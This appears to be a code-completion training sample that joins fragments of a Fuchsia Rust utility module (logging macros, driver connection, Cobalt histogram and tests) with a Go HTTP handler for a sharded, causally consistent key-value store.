HistogramBucket { index: 1, count: 0 },
HistogramBucket { index: 2, count: 0 },
HistogramBucket { index: 3, count: 0 },
HistogramBucket { index: 4, count: 0 }, // overflow
]
);
}
/// CobaltIntHistogram: tests that invalid data values are logged in the correct
/// underflow/overflow buckets.
#[test]
fn test_cobalt_histogram_invalid_data() {
let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
floor: 0,
step_size: 1,
num_buckets: 2,
});
hist.add_data(-2);
hist.add_data(-1);
hist.add_data(0);
hist.add_data(1);
hist.add_data(2);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 2 }, // underflow
HistogramBucket { index: 1, count: 1 },
HistogramBucket { index: 2, count: 1 },
HistogramBucket { index: 3, count: 1 } // overflow
]
);
}
/// Tests that the `get_current_timestamp` function returns the expected current timestamp.
#[test]
fn test_get_current_timestamp() {
use crate::types::Nanoseconds;
let exec = fuchsia_async::TestExecutor::new_with_fake_time().unwrap();
exec.set_fake_time(fuchsia_async::Time::from_nanos(0));
assert_eq!(get_current_timestamp(), Nanoseconds(0));
exec.set_fake_time(fuchsia_async::Time::from_nanos(1000));
assert_eq!(get_current_timestamp(), Nanoseconds(1000));
}
} |
// Add some arbitrary values, making sure some do not land on the bucket boundary to further | random_line_split |
utils.rs | // Copyright 2020 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
/// Logs an error message if the passed in `result` is an error.
#[macro_export]
macro_rules! log_if_err {
($result:expr, $log_prefix:expr) => {
if let Err(e) = $result.as_ref() {
log::error!("{}: {}", $log_prefix, e);
}
};
}
/// Logs an error message if the provided `cond` evaluates to false. Also passes the same expression
/// and message into `debug_assert!`, which will panic if debug assertions are enabled.
#[macro_export]
macro_rules! log_if_false_and_debug_assert {
($cond:expr, $msg:expr) => {
if !($cond) {
log::error!($msg);
debug_assert!($cond, $msg);
}
};
($cond:expr, $fmt:expr, $($arg:tt)+) => {
if !($cond) {
log::error!($fmt, $($arg)+);
debug_assert!($cond, $fmt, $($arg)+);
}
};
}
#[cfg(test)]
mod log_err_with_debug_assert_tests {
use crate::log_if_false_and_debug_assert;
/// Tests that `log_if_false_and_debug_assert` panics for a false expression when debug
/// assertions are enabled.
#[test]
#[should_panic(expected = "this will panic")]
#[cfg(debug_assertions)]
fn test_debug_assert() {
log_if_false_and_debug_assert!(true, "this will not panic");
log_if_false_and_debug_assert!(false, "this will panic");
}
/// Tests that `log_if_false_and_debug_assert` does not panic for a false expression when debug
/// assertions are not enabled.
#[test]
#[cfg(not(debug_assertions))]
fn test_non_debug_assert() {
log_if_false_and_debug_assert!(true, "this will not panic");
log_if_false_and_debug_assert!(false, "this will not panic either");
}
}
/// Export the `connect_to_driver` function to be used throughout the crate.
pub use connect_to_driver::connect_to_driver;
mod connect_to_driver {
use anyhow::{format_err, Error};
use fidl::endpoints::Proxy as _;
use fidl_fuchsia_io::{NodeProxy, OPEN_RIGHT_READABLE, OPEN_RIGHT_WRITABLE};
/// Returns a NodeProxy opened at `path`. The path is guaranteed to exist before the connection
/// is opened.
async fn connect_channel(path: &str) -> Result<NodeProxy, Error> {
device_watcher::recursive_wait_and_open_node(
&io_util::open_directory_in_namespace(
"/dev",
OPEN_RIGHT_READABLE | OPEN_RIGHT_WRITABLE,
)?,
path,
)
.await
}
/// Connects to the driver at `path`, returning a proxy of the specified type. The path is
/// guaranteed to exist before the connection is opened.
///
/// TODO(fxbug.dev/81378): factor this function out to a common library
pub async fn connect_to_driver<T: fidl::endpoints::ProtocolMarker>(
path: &str,
) -> Result<T::Proxy, Error> {
match path.strip_prefix("/dev/") {
Some(path) => fidl::endpoints::ClientEnd::<T>::new(
connect_channel(path)
.await?
.into_channel()
.map_err(|_| format_err!("into_channel failed on NodeProxy"))?
.into_zx_channel(),
)
.into_proxy()
.map_err(Into::into),
None => Err(format_err!("Path must start with /dev/")),
}
}
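    // Illustrative usage sketch (added for clarity; the device path is hypothetical and a real
    // caller would usually request a concrete driver protocol marker rather than fuchsia.io.Node).
    #[allow(dead_code)]
    async fn example_connect_to_thermal_node() -> Result<(), Error> {
        let node =
            connect_to_driver::<fidl_fuchsia_io::NodeMarker>("/dev/class/thermal/000").await?;
        let _ = node; // `node` is a NodeProxy; this sketch drops it immediately
        Ok(())
    }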
#[cfg(test)]
mod tests {
use super::*;
use async_utils::PollExt as _;
use fidl::endpoints::{create_proxy, Proxy, ServerEnd};
use fidl_fuchsia_io::{
DirectoryMarker, NodeMarker, MODE_TYPE_DIRECTORY, OPEN_RIGHT_READABLE,
OPEN_RIGHT_WRITABLE,
};
use fuchsia_async as fasync;
use futures::TryStreamExt as _;
use std::sync::Arc;
use vfs::{
directory::entry::DirectoryEntry, directory::helper::DirectlyMutable,
execution_scope::ExecutionScope, file::vmo::read_only_static, pseudo_directory,
};
fn bind_to_dev(dir: Arc<dyn DirectoryEntry>) {
let (dir_proxy, dir_server) = create_proxy::<DirectoryMarker>().unwrap();
let scope = ExecutionScope::new();
dir.open(
scope,
OPEN_RIGHT_READABLE | OPEN_RIGHT_WRITABLE,
MODE_TYPE_DIRECTORY,
vfs::path::Path::dot(),
ServerEnd::new(dir_server.into_channel()),
);
let ns = fdio::Namespace::installed().unwrap();
ns.bind("/dev", dir_proxy.into_channel().unwrap().into_zx_channel()).unwrap();
}
/// Tests that `connect_to_driver` returns success for the valid existing path.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_success() {
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"thermal" => pseudo_directory! {
"000" => read_only_static("string beans")
}
}
});
connect_to_driver::<NodeMarker>("/dev/class/thermal/000").await.unwrap();
}
/// Tests that `connect_to_driver` doesn't return until the required path is added.
#[test]
fn test_connect_to_driver_late_add() {
let mut executor = fasync::TestExecutor::new().unwrap();
let thermal_dir = pseudo_directory! {
"000" => read_only_static("string cheese (cheddar)")
};
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"thermal" => thermal_dir.clone()
}
});
let connect_future =
&mut Box::pin(connect_to_driver::<NodeMarker>("/dev/class/thermal/001"));
// The required path is initially not present
assert!(executor.run_until_stalled(connect_future).is_pending());
// Add the required path
thermal_dir.add_entry("001", read_only_static("string cheese (mozzarella)")).unwrap();
// Verify the wait future now returns successfully
assert!(executor.run_until_stalled(connect_future).unwrap().is_ok());
}
/// Tests that `connect_to_driver` correctly waits even if the required parent directory
/// does not yet exist.
#[test]
fn test_connect_to_driver_nonexistent_parent_dir() {
let mut executor = fasync::TestExecutor::new().unwrap();
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"cpu" => pseudo_directory! {
"000" => read_only_static("shoestring fries")
}
}
});
assert!(executor
.run_until_stalled(&mut Box::pin(connect_to_driver::<NodeMarker>(
"/dev/class/thermal/000"
)))
.is_pending());
}
/// Tests that the proxy returned by `connect_to_driver` is usable for sending a FIDL
/// request.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_gives_usable_proxy() {
use fidl_fuchsia_device as fdev;
// Create a pseudo directory with a fuchsia.device.Controller FIDL server hosted at
// class/fake_dev_controller and bind it to our /dev
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory! {
"fake_dev_controller" => vfs::service::host(
move |mut stream: fdev::ControllerRequestStream| {
async move {
match stream.try_next().await.unwrap() {
Some(fdev::ControllerRequest::GetCurrentPerformanceState {
responder
}) => {
let _ = responder.send(8);
}
e => panic!("Unexpected request: {:?}", e),
}
}
}
)
}
});
// Connect to the driver and call GetCurrentPerformanceState on it
let result = crate::utils::connect_to_driver::<fdev::ControllerMarker>(
"/dev/class/fake_dev_controller",
)
.await
.expect("Failed to connect to driver")
.get_current_performance_state()
.await
.expect("get_current_performance_state FIDL failed");
// Verify we receive the expected result
assert_eq!(result, 8);
}
/// Verifies that invalid arguments are rejected while valid ones are accepted.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_valid_path() {
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"cpu" => pseudo_directory! {
"000" => read_only_static("stringtown population 1")
}
}
});
connect_to_driver::<NodeMarker>("/svc/fake_service").await.unwrap_err();
connect_to_driver::<NodeMarker>("/dev/class/cpu/000").await.unwrap();
}
}
}
/// The number of nanoseconds since the system was powered on.
pub fn get_current_timestamp() -> crate::types::Nanoseconds {
crate::types::Nanoseconds(fuchsia_async::Time::now().into_nanos())
}
use fidl_fuchsia_cobalt::HistogramBucket;
/// Convenient wrapper for creating and storing an integer histogram to use with Cobalt.
pub struct CobaltIntHistogram {
/// Underlying histogram data storage.
data: Vec<HistogramBucket>,
/// Number of data values that have been added to the histogram.
data_count: u32,
/// Histogram configuration parameters.
config: CobaltIntHistogramConfig,
}
/// Histogram configuration parameters used by CobaltIntHistogram.
pub struct CobaltIntHistogramConfig {
pub floor: i64,
pub num_buckets: u32,
pub step_size: u32,
}
impl CobaltIntHistogram {
/// Create a new CobaltIntHistogram.
pub fn new(config: CobaltIntHistogramConfig) -> Self {
Self { data: Self::new_vec(config.num_buckets), data_count: 0, config }
}
/// Create a new Vec<HistogramBucket> that represents the underlying histogram storage. Two
/// extra buckets are added for underflow and overflow.
fn | (num_buckets: u32) -> Vec<HistogramBucket> {
(0..num_buckets + 2).map(|i| HistogramBucket { index: i, count: 0 }).collect()
}
/// Add a data value to the histogram.
pub fn add_data(&mut self, n: i64) {
// Add one to index to account for underflow bucket at index 0
let mut index = 1 + (n - self.config.floor) / self.config.step_size as i64;
// Clamp index to 0 and self.data.len() - 1, which Cobalt uses for underflow and overflow,
// respectively
index = num_traits::clamp(index, 0, self.data.len() as i64 - 1);
self.data[index as usize].count += 1;
self.data_count += 1;
}
/// Get the number of data elements that have been added to the histogram.
pub fn count(&self) -> u32 {
self.data_count
}
/// Clear the histogram.
pub fn clear(&mut self) {
self.data = Self::new_vec(self.config.num_buckets);
self.data_count = 0;
}
/// Get the underlying Vec<HistogramBucket> of the histogram.
pub fn get_data(&self) -> Vec<HistogramBucket> {
self.data.clone()
}
}
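// Example usage sketch (added for illustration; the config values are arbitrary and the test
// only exercises the public API defined above).
#[cfg(test)]
mod cobalt_int_histogram_example {
    use super::*;
    /// Adds one sample, checks the running count and bucket, then clears the histogram.
    #[test]
    fn test_example_usage() {
        let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
            floor: 0,
            step_size: 5,
            num_buckets: 4,
        });
        hist.add_data(7); // 1 + (7 - 0) / 5 = 2, so this lands in bucket index 2
        assert_eq!(hist.count(), 1);
        assert_eq!(hist.get_data()[2].count, 1);
        hist.clear();
        assert_eq!(hist.count(), 0);
    }
}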
// Finds all of the node config files under the test package's "/config/data" directory. The node
// config files are identified by a suffix of "node_config.json". The function then calls the
// provided `test_config_file` function for each found config file, passing the JSON structure in as
// an argument. The function returns success if each call to `test_config_file` succeeds. Otherwise,
// the first error encountered is returned.
#[cfg(test)]
pub fn test_each_node_config_file(
test_config_file: impl Fn(&Vec<serde_json::Value>) -> Result<(), anyhow::Error>,
) -> Result<(), anyhow::Error> {
use anyhow::Context as _;
use serde_json as json;
use std::fs;
use std::fs::File;
use std::io::BufReader;
let config_files = fs::read_dir("/config/data")
.unwrap()
.filter(|f| f.as_ref().unwrap().file_name().to_str().unwrap().ends_with("node_config.json"))
.map(|f| {
let path = f.unwrap().path();
let file_path = path.to_str().unwrap().to_string();
let json = json::from_reader(BufReader::new(File::open(path).unwrap())).unwrap();
(file_path, json)
})
.collect::<Vec<_>>();
assert!(config_files.len() > 0, "No config files found");
for (file_path, config_file) in config_files {
test_config_file(&config_file).context(format!("Failed for file {}", file_path))?;
}
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
/// CobaltIntHistogram: tests that data added to the CobaltIntHistogram is correctly counted and
/// bucketed.
#[test]
fn test_cobalt_histogram_data() {
// Create the histogram and verify initial data count is 0
let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
floor: 50,
step_size: 10,
num_buckets: 3,
});
assert_eq!(hist.count(), 0);
// Add some arbitrary values, making sure some do not land on the bucket boundary to further
// verify the bucketing logic
hist.add_data(50);
hist.add_data(65);
hist.add_data(75);
hist.add_data(79);
// Verify the values were counted and bucketed properly
assert_eq!(hist.count(), 4);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 0 }, // underflow
HistogramBucket { index: 1, count: 1 },
HistogramBucket { index: 2, count: 1 },
HistogramBucket { index: 3, count: 2 },
HistogramBucket { index: 4, count: 0 } // overflow
]
);
// Verify `clear` works as expected
hist.clear();
assert_eq!(hist.count(), 0);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 0 }, // underflow
HistogramBucket { index: 1, count: 0 },
HistogramBucket { index: 2, count: 0 },
HistogramBucket { index: 3, count: 0 },
HistogramBucket { index: 4, count: 0 }, // overflow
]
);
}
/// CobaltIntHistogram: tests that invalid data values are logged in the correct
/// underflow/overflow buckets.
#[test]
fn test_cobalt_histogram_invalid_data() {
let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
floor: 0,
step_size: 1,
num_buckets: 2,
});
hist.add_data(-2);
hist.add_data(-1);
hist.add_data(0);
hist.add_data(1);
hist.add_data(2);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 2 }, // underflow
HistogramBucket { index: 1, count: 1 },
HistogramBucket { index: 2, count: 1 },
HistogramBucket { index: 3, count: 1 } // overflow
]
);
}
/// Tests that the `get_current_timestamp` function returns the expected current timestamp.
#[test]
fn test_get_current_timestamp() {
use crate::types::Nanoseconds;
let exec = fuchsia_async::TestExecutor::new_with_fake_time().unwrap();
exec.set_fake_time(fuchsia_async::Time::from_nanos(0));
assert_eq!(get_current_timestamp(), Nanoseconds(0));
exec.set_fake_time(fuchsia_async::Time::from_nanos(1000));
assert_eq!(get_current_timestamp(), Nanoseconds(1000));
}
}
| new_vec | identifier_name |
put.go | package utility
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"time"
"github.com/gin-gonic/gin"
)
const (
keyLimit int = 50 // maximum number of characters allowed for a key
)
type StoreVal struct {
Value string `json:"value"`
CausalMetadata []int `json:"causal-metadata"`
}
// struct designed for decoding JSON data received from a node in a different shard
type fromNode struct {
Message string `json:"message"`
CausalMetadata []int `json:"causal-metadata"`
ShardId int `json:"shard-id"`
}
func canDeliver(senderVC []int, replicaVC []int, view []string) bool {
// conditions for delivery:
// senderVC[senderslot] = replicaVC[senderslot] + 1
// senderVC[notsender] <= replicaVC[not sender]
senderID := senderVC[len(view)] // sender position in VC
for i := 0; i < len(view); i++ {
//if sender clock isn't updated by 1 more
if i == senderID && senderVC[i] != replicaVC[i]+1 {
return false
		} else if i != senderID && senderVC[i] > replicaVC[i] { //if something other than the sender has incremented its clock
fmt.Println("canDeliver: WE CAN'T DELIVER!!")
return false
}
}
	//Otherwise the sender's slot is ahead by exactly one and no other slot is ahead, so the message can be delivered
return true
}
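// exampleCanDeliver is an illustrative sketch (added for clarity, not in the original source):
// it walks the delivery condition with a three-replica view whose sender sits in slot 1 of the
// vector clock; the trailing element of the sender clock is its index, and the addresses are made up.
func exampleCanDeliver() {
	view := []string{"10.0.0.1:8085", "10.0.0.2:8085", "10.0.0.3:8085"}
	replicaVC := []int{0, 1, 0}
	// Only the sender's slot is ahead, and by exactly one, so this message is deliverable.
	fmt.Println(canDeliver([]int{0, 2, 0, 1}, replicaVC, view)) // true
	// Slot 0 is also ahead, meaning a causally earlier write is missing, so it is not.
	fmt.Println(canDeliver([]int{1, 2, 0, 1}, replicaVC, view)) // false
}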
func max(x int, y int) int {
if x < y {
return y
}
return x
}
// calculate new VC: max(senderVC, replicaVC)
func updateVC(senderVC []int, replicaVC []int, view []string) []int {
newVC := make([]int, len(view))
for i := 0; i < len(view); i++ {
fmt.Printf("SENDERVC: %v\n", senderVC)
fmt.Printf("REPLICAVC: %v\n", replicaVC)
newVC[i] = max(senderVC[i], replicaVC[i])
}
return newVC
}
//compareVC returns whichever of the two vector clocks has the larger component sum over the
//view, i.e. the clock that reflects more delivered events.
func compareVC(leftVC []int, rightVC []int, view []string) []int {
leftSum := 0
rightSum := 0
for i := 0; i < len(view); i++ {
leftSum += leftVC[i]
rightSum += rightVC[i]
}
if leftSum > rightSum {
return leftVC
}
return rightVC
}
func updateKvStore(view []string, dict map[string]StoreVal, currVC []int, s *SharedShardInfo) {
//get updated kvstore from other nodes in the current shard
newStoreVal := make(map[string]StoreVal)
Mu.Mutex.Lock()
for i := 0; i < len(s.ShardMembers[s.CurrentShard]); i++ {
newStoreVal = KvGet(s.ShardMembers[s.CurrentShard][i])
if len(newStoreVal) > 0 {
break
}
}
Mu.Mutex.Unlock()
//Update local vector clock
for _, value := range newStoreVal {
currVC = compareVC(currVC, value.CausalMetadata, view)
}
Mu.Mutex.Lock()
//replace our KVStore with the new one if we get a change
for key, storeVal := range newStoreVal {
_, exists := dict[key]
if !exists { // if the key doesn't exist in the store, then add it
dict[fmt.Sprint(key)] = StoreVal{Value: storeVal.Value, CausalMetadata: storeVal.CausalMetadata}
}
}
Mu.Mutex.Unlock()
}
// ShardPutStore stores the key-value pair locally when the key hashes to this node's shard id;
// otherwise it forwards the request to one of the nodes in the shard that the key hashes to.
func ShardPutStore(s *SharedShardInfo, view *View, store map[string]StoreVal, localAddr int, currVC []int) {
var (
d StoreVal
fn fromNode
)
s.Router.PUT("/key-value-store/:key", func(c *gin.Context) {
key := c.Param("key")
// body := c.Request.Body
data, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(data[:])
json.Unmarshal(data, &d)
defer c.Request.Body.Close()
shardId := HashModN(key, s.ShardCount)
| //If causal metadata is sent from client, we need to update the KVStore/check if we can deliver
//Assume we can't so just update each time
if len(d.CausalMetadata) > 0 {
updateKvStore(view.PersonalView, store, currVC, s)
} else if len(d.CausalMetadata) == 0 {
Mu.Mutex.Lock()
d.CausalMetadata = make([]int, len(view.PersonalView))
for index := range view.PersonalView {
d.CausalMetadata[index] = 0
}
Mu.Mutex.Unlock()
}
// increment on receive so we send back correct causal clock
d.CausalMetadata[localAddr]++
d.CausalMetadata = append(d.CausalMetadata, localAddr) //Index of sender address
currVC = d.CausalMetadata
fmt.Printf("***CHECK shardId, s.CurrentShard, d.Val, & d.causalmetadata: %v, %v, (%v, %v)****", shardId, s.CurrentShard, d.Value, d.CausalMetadata)
// if the newShardId matches that of the current node's shard id, then we can add to the store, & reply back
if shardId == s.CurrentShard {
if _, exists := store[key]; exists {
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
					c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
} else { // otherwise we insert a new key-value pair //
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
fmt.Printf("******CURRENT STORE: %v**********", store)
					c.JSON(http.StatusCreated, gin.H{"message": "Added successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
}
} else { // otherwise we must create a new request and forward it to one of the members with the given <shard-id>
Mu.Mutex.Lock()
fmt.Printf("*********s.shardMembers[shardId] IN ELSE: %v******", s.ShardMembers[shardId])
for index, member := range s.ShardMembers[shardId] {
if member == view.SocketAddr {
continue
}
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+s.ShardMembers[shardId][index]+"/key-value-store/"+key, bytes.NewBuffer(jsonData))
//fmt.Printf("********DATA BEING SENT: %v********", data)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
Mu.Mutex.Unlock()
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil { // if an error occurs, assume the node is dead, so continue attempting to send to another node in the provided shard
continue
}
body, _ := ioutil.ReadAll(response.Body)
defer response.Body.Close()
// jsonData = json.RawMessage(body)
json.Unmarshal(body, &fn)
fmt.Printf("********CHECK BODY BEING SENT: %v********", string(body[:]))
c.JSON(response.StatusCode, gin.H{"message": fn.Message, "causal-metadata": fn.CausalMetadata, "shard-id": fn.ShardId})
break // if we managed to receive a response back after forwarding, don't forward to other nodes in that same shard
}
Mu.Mutex.Unlock()
}
}
// send nodes in the current shard the key as well
Mu.Mutex.Lock()
if shardId == s.CurrentShard {
for _, member := range s.ShardMembers[s.CurrentShard] {
if member == view.SocketAddr { // don't send a PUT request to self
continue
}
c.Request.URL.Host = member
c.Request.URL.Scheme = "http"
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+member+"/key-value-store-r/"+key, bytes.NewBuffer(jsonData))
if err != nil {
http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
return
}
Mu.Mutex.Unlock()
fwdRequest.Header = c.Request.Header
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
defer response.Body.Close()
}
}
Mu.Mutex.Unlock()
})
}
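// exampleHashModN is an illustrative stand-in (assumption, not the project's real HashModN):
// the routing above only requires that a key map deterministically to a shard id in
// [0, shardCount), for example by hashing the key bytes and taking the result modulo N.
func exampleHashModN(key string, shardCount int) int {
	sum := 0
	for _, b := range []byte(key) {
		sum += int(b)
	}
	return sum % shardCount
}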
//ReplicatePut Endpoint for replication
func ReplicatePut(r *gin.Engine, dict map[string]StoreVal, localAddr int, view []string, currVC []int, s *SharedShardInfo) {
var d StoreVal
r.PUT("/key-value-store-r/:key", func(c *gin.Context) {
key := c.Param("key")
body, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(body[:])
fmt.Printf("STRBODY: %s\n", strBody)
json.Unmarshal(body, &d)
fmt.Printf("VALUE: %s\n", d.Value)
fmt.Printf("CAUSAL METADATA REPLICATION: %v\n", d.CausalMetadata)
defer c.Request.Body.Close()
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
// if a key-value pair already exists, then replace the old value //
if _, exists := dict[key]; exists {
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
//get updated kvstore from other replicas
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
} else { // otherwise we insert a new key-value pair //
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
}
}
fmt.Printf("*******AFTER REPLICATION STORE: %v*******", dict)
})
} | if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
| random_line_split |
put.go | package utility
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"time"
"github.com/gin-gonic/gin"
)
const (
keyLimit int = 50 // maximum number of characters allowed for a key
)
type StoreVal struct {
Value string `json:"value"`
CausalMetadata []int `json:"causal-metadata"`
}
// struct designed for decoding JSON data received from a node in a different shard
type fromNode struct {
Message string `json:"message"`
CausalMetadata []int `json:"causal-metadata"`
ShardId int `json:"shard-id"`
}
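// exampleDecodeFromNode is an illustrative sketch (added for clarity; the payload is made up):
// it decodes the JSON shape implied by the struct tags above, i.e. the reply a node receives
// after forwarding a request to a node in a different shard.
func exampleDecodeFromNode() {
	payload := []byte(`{"message": "Added successfully", "causal-metadata": [1, 0, 0], "shard-id": 2}`)
	var fn fromNode
	if err := json.Unmarshal(payload, &fn); err != nil {
		fmt.Println("decode failed:", err)
		return
	}
	fmt.Println(fn.Message, fn.CausalMetadata, fn.ShardId)
}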
func canDeliver(senderVC []int, replicaVC []int, view []string) bool {
// conditions for delivery:
// senderVC[senderslot] = replicaVC[senderslot] + 1
// senderVC[notsender] <= replicaVC[not sender]
senderID := senderVC[len(view)] // sender position in VC
for i := 0; i < len(view); i++ {
//if sender clock isn't updated by 1 more
if i == senderID && senderVC[i] != replicaVC[i]+1 {
return false
		} else if i != senderID && senderVC[i] > replicaVC[i] { //if something other than the sender has incremented its clock
fmt.Println("canDeliver: WE CAN'T DELIVER!!")
return false
}
}
	//Otherwise the sender's slot is ahead by exactly one and no other slot is ahead, so the message can be delivered
return true
}
func max(x int, y int) int {
if x < y {
return y
}
return x
}
// calculate new VC: max(senderVC, replicaVC)
func updateVC(senderVC []int, replicaVC []int, view []string) []int {
newVC := make([]int, len(view))
for i := 0; i < len(view); i++ {
fmt.Printf("SENDERVC: %v\n", senderVC)
fmt.Printf("REPLICAVC: %v\n", replicaVC)
newVC[i] = max(senderVC[i], replicaVC[i])
}
return newVC
}
//compareVC returns whichever of the two vector clocks has the larger component sum over the
//view, i.e. the clock that reflects more delivered events.
func compareVC(leftVC []int, rightVC []int, view []string) []int {
leftSum := 0
rightSum := 0
for i := 0; i < len(view); i++ {
leftSum += leftVC[i]
rightSum += rightVC[i]
}
if leftSum > rightSum {
return leftVC
}
return rightVC
}
func updateKvStore(view []string, dict map[string]StoreVal, currVC []int, s *SharedShardInfo) {
//get updated kvstore from other nodes in the current shard
newStoreVal := make(map[string]StoreVal)
Mu.Mutex.Lock()
for i := 0; i < len(s.ShardMembers[s.CurrentShard]); i++ {
newStoreVal = KvGet(s.ShardMembers[s.CurrentShard][i])
if len(newStoreVal) > 0 {
break
}
}
Mu.Mutex.Unlock()
//Update local vector clock
for _, value := range newStoreVal {
currVC = compareVC(currVC, value.CausalMetadata, view)
}
Mu.Mutex.Lock()
//replace our KVStore with the new one if we get a change
for key, storeVal := range newStoreVal {
_, exists := dict[key]
if !exists { // if the key doesn't exist in the store, then add it
dict[fmt.Sprint(key)] = StoreVal{Value: storeVal.Value, CausalMetadata: storeVal.CausalMetadata}
}
}
Mu.Mutex.Unlock()
}
// ShardPutStore stores the key-value pair locally when the key hashes to this node's shard id;
// otherwise it forwards the request to one of the nodes in the shard that the key hashes to.
func ShardPutStore(s *SharedShardInfo, view *View, store map[string]StoreVal, localAddr int, currVC []int) {
var (
d StoreVal
fn fromNode
)
s.Router.PUT("/key-value-store/:key", func(c *gin.Context) {
key := c.Param("key")
// body := c.Request.Body
data, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(data[:])
json.Unmarshal(data, &d)
defer c.Request.Body.Close()
shardId := HashModN(key, s.ShardCount)
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
//If causal metadata is sent from client, we need to update the KVStore/check if we can deliver
//Assume we can't so just update each time
if len(d.CausalMetadata) > 0 {
updateKvStore(view.PersonalView, store, currVC, s)
} else if len(d.CausalMetadata) == 0 {
Mu.Mutex.Lock()
d.CausalMetadata = make([]int, len(view.PersonalView))
for index := range view.PersonalView {
d.CausalMetadata[index] = 0
}
Mu.Mutex.Unlock()
}
// increment on receive so we send back correct causal clock
d.CausalMetadata[localAddr]++
d.CausalMetadata = append(d.CausalMetadata, localAddr) //Index of sender address
currVC = d.CausalMetadata
fmt.Printf("***CHECK shardId, s.CurrentShard, d.Val, & d.causalmetadata: %v, %v, (%v, %v)****", shardId, s.CurrentShard, d.Value, d.CausalMetadata)
// if the newShardId matches that of the current node's shard id, then we can add to the store, & reply back
if shardId == s.CurrentShard {
if _, exists := store[key]; exists {
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
					c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
} else { // otherwise we insert a new key-value pair //
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
fmt.Printf("******CURRENT STORE: %v**********", store)
					c.JSON(http.StatusCreated, gin.H{"message": "Added successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
}
} else { // otherwise we must create a new request and forward it to one of the members with the given <shard-id>
